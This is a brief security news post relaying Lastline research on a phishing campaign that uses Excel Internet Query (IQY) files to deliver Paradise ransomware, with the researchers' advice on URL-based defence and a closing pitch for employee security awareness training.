Researchers at Lastline have come across a phishing campaign that’s using Internet Query (IQY) files to bypass security filters and deliver a new version of the Paradise ransomware. The researchers explain that IQY is an obscure but legitimate Microsoft Office file format that won’t be flagged by many security solutions.
“IQY, or Internet Query files, are simple text files read by Excel that download data from the Internet,” they write. “This file type can be leveraged to download an Excel formula (command) that could abuse a system process, such as PowerShell, cmd, mshta, or any other LoLBins (Living-off-the-Land Binaries). As this is a legitimate Excel file type, many organizations will not block or filter it. For organizations that do have security appliances that analyze attachments, these files may not flag as malware, as there is no payload.”
Paradise ransomware has been in circulation since 2017, and it’s still receiving updates from its developers. In this case, the ransom note contains a link to a chat room where the victim can communicate with the attacker, although the researchers didn’t get a response to their messages.
The researchers conclude that these files are difficult to flag since there’s nothing inherently malicious in them, so organizations need to focus on the URL.
“In summary, this campaign exhibited how weaponized IQYs can be an effective technique for an attacker to infiltrate a network,” they write. “Since these IQYs contain no payload (just a URL), they can be challenging for organizations to detect. Organizations may have to rely on a 3rd party URL reputation service if they do not have appliances in place to analyze and interrogate these URLs.”
Even URL reputation services aren’t foolproof, since attackers are constantly shifting to new domains. Technical defenses can’t stop every malicious email from entering your network, and it only takes one employee opening an attachment or clicking on a link for your organization to be compromised. Your employees are an essential line of defense, and new-school security awareness training can help them thwart these attacks.
Lastline has the story: https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/